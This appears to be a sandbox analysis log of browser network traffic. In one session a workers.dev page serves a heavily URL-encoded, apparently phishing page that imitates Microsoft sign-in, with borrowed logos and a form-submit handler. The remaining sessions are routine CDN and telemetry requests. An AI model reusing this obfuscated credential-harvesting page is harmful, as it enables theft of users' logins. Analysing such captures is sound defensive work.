                                  2024-04-17 23:13:12 UTC1369INData Raw: 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 25 32 35 32 37 6e 6f 6e 65 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 41 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 25 32 35 32 37 62 6c 6f 63 6b 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 41 2e 73 74 79 6c 65 2e 6f 70 61 63 69 74 79 25 32 35 32 30 25 32 35 33 44 25 32
                                  Data Ascii: 520%2520%2520%2520%2520%2520%2520%2520butt.style.display%2520%253D%2520%2527none%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520buttA.style.display%2520%253D%2520%2527block%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520buttA.style.opacity%2520%253D%2
                                  2024-04-17 23:13:12 UTC1369INData Raw: 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 30 41 25 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 66 6f 72 6d 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 25 32 35 32 38 25 32 35 32 32 73 75 62 6d 69 74 25 32 35 32 32 25 32 35 32 43 25 32 35 32 30 65 25 32 35 32 30 25 32 35 33 44 25 32 35 33 45 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 25 32 35 32 38 25 32 35 32 39 25 32 35 33 42 25 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32
                                  Data Ascii: 520%2520%2520%2520%2520%250A%250A%250A%2520%2520%2520%2520%2520%2520forma.addEventListener%2528%2522submit%2522%252C%2520e%2520%253D%253E%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520e.preventDefault%2528%2529%253B%250A%250A%2520%2520%2520%2


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.44974513.107.213.414433668C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:13:12 UTC418OUTGET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1
                                  Host: aadcdn.msauth.net
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-04-17 23:13:12 UTC800INHTTP/1.1 200 OK
                                  Date: Wed, 17 Apr 2024 23:13:12 GMT
                                  Content-Type: image/svg+xml
                                  Content-Length: 1435
                                  Connection: close
                                  Cache-Control: public, max-age=31536000
                                  Content-Encoding: gzip
                                  Last-Modified: Fri, 17 Jan 2020 19:28:38 GMT
                                  ETag: 0x8D79B8373CB2849
                                  x-ms-request-id: a0b77564-001e-004a-2b50-90389a000000
                                  x-ms-version: 2009-09-19
                                  x-ms-lease-status: unlocked
                                  x-ms-blob-type: BlockBlob
                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                  Access-Control-Allow-Origin: *
                                  x-azure-ref: 20240417T231312Z-18655757dbcn87sbmvp6c4ap780000000610000000001g31
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-04-17 23:13:12 UTC1435INData Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5
                                  Data Ascii: WMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.44974413.107.213.414433668C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:13:12 UTC418OUTGET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1
                                  Host: aadcdn.msauth.net
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-04-17 23:13:12 UTC779INHTTP/1.1 200 OK
                                  Date: Wed, 17 Apr 2024 23:13:12 GMT
                                  Content-Type: image/svg+xml
                                  Content-Length: 621
                                  Connection: close
                                  Cache-Control: public, max-age=31536000
                                  Content-Encoding: gzip
                                  Last-Modified: Tue, 10 Nov 2020 03:41:24 GMT
                                  ETag: 0x8D8852A7FA6B761
                                  x-ms-request-id: 8e0dd613-801e-0042-0a1c-91608b000000
                                  x-ms-version: 2009-09-19
                                  x-ms-lease-status: unlocked
                                  x-ms-blob-type: BlockBlob
                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                  Access-Control-Allow-Origin: *
                                  x-azure-ref: 20240417T231312Z-r1f585c6b65wz25qxmdpx2rpgg00000001ag000000002tgy
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_MISS
                                  Accept-Ranges: bytes
                                  2024-04-17 23:13:12 UTC621INData Raw: 1f 8b 08 00 00 00 00 00 04 00 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8
                                  Data Ascii: }UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lh


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.44974635.190.80.14433668C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:13:12 UTC550OUTOPTIONS /report/v4?s=BzVR%2BDQANlMmi0bxjzPy6NPaOgBMhrmC%2BQGBeOKUVWkFyUgguBNYwzcgVdDezKxaWkyNas486e0m2gX8FOgR%2FRfbMht%2Bdi9ElQTl%2Fvptpo3YbSIik%2Bqa8p5ma1voQYmrKla%2FynsB HTTP/1.1
                                  Host: a.nel.cloudflare.com
                                  Connection: keep-alive
                                  Origin: https://www.linkpicture.com
                                  Access-Control-Request-Method: POST
                                  Access-Control-Request-Headers: content-type
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-04-17 23:13:12 UTC336INHTTP/1.1 200 OK
                                  Content-Length: 0
                                  access-control-max-age: 86400
                                  access-control-allow-methods: POST, OPTIONS
                                  access-control-allow-origin: *
                                  access-control-allow-headers: content-length, content-type
                                  date: Wed, 17 Apr 2024 23:13:12 GMT
                                  Via: 1.1 google
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.44974735.190.80.14433668C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:13:12 UTC488OUTPOST /report/v4?s=BzVR%2BDQANlMmi0bxjzPy6NPaOgBMhrmC%2BQGBeOKUVWkFyUgguBNYwzcgVdDezKxaWkyNas486e0m2gX8FOgR%2FRfbMht%2Bdi9ElQTl%2Fvptpo3YbSIik%2Bqa8p5ma1voQYmrKla%2FynsB HTTP/1.1
                                  Host: a.nel.cloudflare.com
                                  Connection: keep-alive
                                  Content-Length: 463
                                  Content-Type: application/reports+json
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-04-17 23:13:12 UTC463OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 30 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6e 73 6a 77 2e 6e 65 77 66 2e 77 6f 72 6b 65 72 73 2e 64 65 76 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 32 33 35 2e 31 38 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c
                                  Data Ascii: [{"age":0,"body":{"elapsed_time":600,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://nsjw.newf.workers.dev/","sampling_fraction":1.0,"server_ip":"104.21.235.182","status_code":404,"type":"http.error"},"type":"network-error",
                                  2024-04-17 23:13:13 UTC168INHTTP/1.1 200 OK
                                  Content-Length: 0
                                  date: Wed, 17 Apr 2024 23:13:12 GMT
                                  Via: 1.1 google
                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.449749172.67.204.1854433668C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:13:12 UTC356OUTGET /favicon.ico HTTP/1.1
                                  Host: nsjw.newf.workers.dev
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2024-04-17 23:13:13 UTC564INHTTP/1.1 200 OK
                                  Date: Wed, 17 Apr 2024 23:13:13 GMT
                                  Content-Type: text/html;charset=UTF-8
                                  Content-Length: 13452
                                  Connection: close
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sc5CgxOoYo60RZJxLJ%2BOFXHhRbxvCfDovb%2FSplaM31KhT1HPgr2hZ6vV2wyAPBomPy2P%2FU%2BC%2Fm1Kz9GLggE5H8ELeFMcNinmZBdvAf%2B1%2BBbXLFT%2BLOr%2FIXzIVtcXlY%2F2jNdQaoKGrPk%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 87601ab93daf53a9-ATL
                                  alt-svc: h3=":443"; ma=86400
                                  2024-04-17 23:13:13 UTC805INData Raw: 0a 20 20 20 3c 3c 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 25 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 30 68 74 6d 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 68 74 6d 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 68 65 61 64 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 6d 65 74 61 25 32 35 32 30 63 68 61 72 73 65 74 25 32 35 33 44 25 32 35 32 32 75 74 66 2d 38 25 32 35 32 32 25 32 35 33 45 25 32 35 30
                                  Data Ascii: <<script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253C%2521DOCTYPE%2520html%253E%250A%253Chtml%253E%250A%2520%2520%253Chead%253E%250A%2520%2520%2520%2520%253Cmeta%2520charset%253D%2522utf-8%2522%253E%250
                                  2024-04-17 23:13:13 UTC1369INData Raw: 6e 67 25 32 35 32 37 25 32 35 32 39 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 70 61 64 64 69 6e 67 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 6d 61 72 67 69 6e 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 25 32 35 33 41 25 32 35 32 30 63 6f 76 65 72 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6f 6e 74 2d 66 61 6d 69 6c 79 25 32 35 33 41 25 32 35 32 30 41 72 69 61 6c 25 32 35 32 43 25 32 35 32 30 48 65 6c 76 65 74 69 63 61 25 32 35 32 43 25 32 35 32 30 73 61 6e 73 2d 73 65 72 69 66 25 32 35 33 42 25 32 35 30 41 25 32 35 37 44 25 32 35 30 41 25 32 35 30 41 2e 66 6f 72 6d 61 6c 25
                                  Data Ascii: ng%2527%2529%253B%250A%2520%2520padding%253A%25200%253B%250A%2520%2520margin%253A%25200%253B%250A%2520%2520background-size%253A%2520cover%253B%250A%2520%2520font-family%253A%2520Arial%252C%2520Helvetica%252C%2520sans-serif%253B%250A%257D%250A%250A.formal%
                                  2024-04-17 23:13:13 UTC1369INData Raw: 74 74 6f 6e 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 70 61 64 64 69 6e 67 25 32 35 33 41 25 32 35 32 30 31 30 70 78 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 62 6f 72 64 65 72 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 77 69 64 74 68 25 32 35 33 41 25 32 35 32 30 34 38 25 32 35 32 35 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6c 6f 61 74 25 32 35 33 41 25 32 35 32 30 72 69 67 68 74 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 66 6f 6e 74 2d 77 65 69 67 68 74 25 32 35 33 41 25 32 35 32 30 62 6f 6c 64 25 32 35 33 42 25 32 35 30 41 25 32 35 37 44 25 32 35 30 41 2e 62 75 74 74 6f 6e 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25
                                  Data Ascii: tton%257B%250A%2520%2520padding%253A%252010px%253B%250A%2520%2520border%253A%2520none%253B%250A%2520%2520width%253A%252048%2525%253B%250A%2520%2520float%253A%2520right%253B%250A%2520%2520font-weight%253A%2520bold%253B%250A%257D%250A.button%257B%250A%2520%
                                  2024-04-17 23:13:13 UTC1369INData Raw: 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 64 69 73 70 6c 61 79 25 32 35 33 41 25 32 35 32 30 6e 6f 6e 65 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 6f 70 61 63 69 74 79 25 32 35 33 41 25 32 35 32 30 30 25 32 35 33 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 37 44 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 33 7a 69 70 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 64 69 73 70 6c 61 79 25 32 35 33
                                  Data Ascii: 20%2520%2520%2520display%253A%2520none%253B%250A%2520%2520%2520%2520%2520%2520%2520%2520opacity%253A%25200%253B%250A%2520%2520%2520%2520%2520%2520%257D%250A%2520%2520%2520%2520%2520%2520%2523zip%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520display%253
                                  2024-04-17 23:13:13 UTC1369INData Raw: 32 30 63 6c 61 73 73 25 32 35 33 44 25 32 35 32 32 66 6f 72 6d 61 6c 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 69 6d 67 25 32 35 32 30 73 72 63 25 32 35 33 44 25 32 35 32 32 68 74 74 70 73 25 32 35 33 41 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 6d 69 63 72 6f 73 6f 66 74 5f 6c 6f 67 6f 5f 65 65 35 63 38 64 39 66 62 36 32 34 38 63 39 33 38 66 64 30 64 63 31 39 33 37 30 65 39 30 62 64 2e 73 76 67 25 32 35 32 32 25 32 35 32 30 61 6c 74 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 30 41 25
                                  Data Ascii: 20class%253D%2522formal%2522%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253Cimg%2520src%253D%2522https%253A//aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg%2522%2520alt%253D%2522%2522%253E%250A%250A%
                                  2024-04-17 23:13:13 UTC1369INData Raw: 32 35 33 43 2f 70 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 61 25 32 35 32 30 68 72 65 66 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 32 30 63 6c 61 73 73 25 32 35 33 44 25 32 35 32 32 63 72 65 61 74 25 32 35 32 32 25 32 35 33 45 43 72 65 61 74 65 25 32 35 32 30 6f 6e 65 25 32 35 32 31 25 32 35 33 43 2f 61 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 2f 64 69 76 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32
                                  Data Ascii: 253C/p%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520%253Ca%2520href%253D%2522%2522%2520class%253D%2522creat%2522%253ECreate%2520one%2521%253C/a%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253C/div%253E%250A%2520%2520%2520%2520%2520%252
                                  2024-04-17 23:13:13 UTC1369INData Raw: 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 69 6d 67 25 32 35 32 30 73 72 63 25 32 35 33 44 25 32 35 32 32 68 74 74 70 73 25 32 35 33 41 2f 2f 61 61 64 63 64 6e 2e 6d 73 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 73 69 67 6e 69 6e 2d 6f 70 74 69 6f 6e 73 5f 34 65 34 38 30 34 36 63 65 37 34 66 34 62 38 39 64 34 35 30 33 37 63 39 30 35 37 36 62 66 61 63 2e 73 76 67 25 32 35 32 32 25 32 35 32 30 61 6c 74 25 32 35 33 44 25 32 35 32 32 25 32 35 32 32 25 32 35 33 45 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 33 43 70 25 32 35 33 45 53 69 67 6e 2d 69 6e 25 32 35
                                  Data Ascii: 520%2520%2520%2520%2520%253Cimg%2520src%253D%2522https%253A//aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg%2522%2520alt%253D%2522%2522%253E%250A%2520%2520%2520%2520%2520%2520%2520%2520%253Cp%253ESign-in%25
                                  2024-04-17 23:13:13 UTC1369INData Raw: 35 32 37 2e 6d 61 69 6c 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 63 6f 6e 73 74 25 32 35 32 30 6e 6f 61 63 63 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 35 32 38 25 32 35 32 37 2e 6e 6f 61 63 63 63 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 63 6f 6e 73 74 25 32 35 32 30 63 72 65 61 74 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 25 32 35 32 38 25 32 35 32 37 2e 63 72 65 61 74 25 32 35 32 37 25 32 35 32 39 25 32 35 30 41 25 32 35 32 30
                                  Data Ascii: 527.mail%2527%2529%250A%2520%2520%2520%2520%2520%2520const%2520noacc%2520%253D%2520document.querySelector%2528%2527.noaccc%2527%2529%250A%2520%2520%2520%2520%2520%2520const%2520creat%2520%253D%2520document.querySelector%2528%2527.creat%2527%2529%250A%2520
                                  2024-04-17 23:13:13 UTC1369INData Raw: 6e 6f 6e 65 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 25 32 35 32 37 6e 6f 6e 65 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 41 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 25 32 35 32 30 25 32 35 33 44 25 32 35 32 30 25 32 35 32 37 62 6c 6f 63 6b 25 32 35 32 37 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 62 75 74 74 41 2e 73 74 79 6c 65 2e 6f 70 61
                                  Data Ascii: none%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520butt.style.display%2520%253D%2520%2527none%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520buttA.style.display%2520%253D%2520%2527block%2527%250A%2520%2520%2520%2520%2520%2520%2520%2520buttA.style.opa
                                  2024-04-17 23:13:13 UTC1369INData Raw: 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 30 41 25 32 35 30 41 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 66 6f 72 6d 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 25 32 35 32 38 25 32 35 32 32 73 75 62 6d 69 74 25 32 35 32 32 25 32 35 32 43 25 32 35 32 30 65 25 32 35 32 30 25 32 35 33 44 25 32 35 33 45 25 32 35 37 42 25 32 35 30 41 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 25 32 35 32 30 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 25 32 35 32 38 25 32 35 32 39 25 32 35 33 42 25 32 35 30 41 25 32 35 30 41 25
                                  Data Ascii: 250A%250A%2520%2520%2520%2520%2520%2520%250A%250A%250A%2520%2520%2520%2520%2520%2520forma.addEventListener%2528%2522submit%2522%252C%2520e%2520%253D%253E%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520%2520%2520e.preventDefault%2528%2529%253B%250A%250A%


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.44975323.201.212.130443
                                  TimestampBytes transferredDirectionData
                                  2024-04-17 23:13:14 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept: */*
                                  Accept-Encoding: identity
                                  User-Agent: Microsoft BITS/7.8
                                  Host: fs.microsoft.com
                                  2024-04-17 23:13:14 UTC467INHTTP/1.1 200 OK
                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
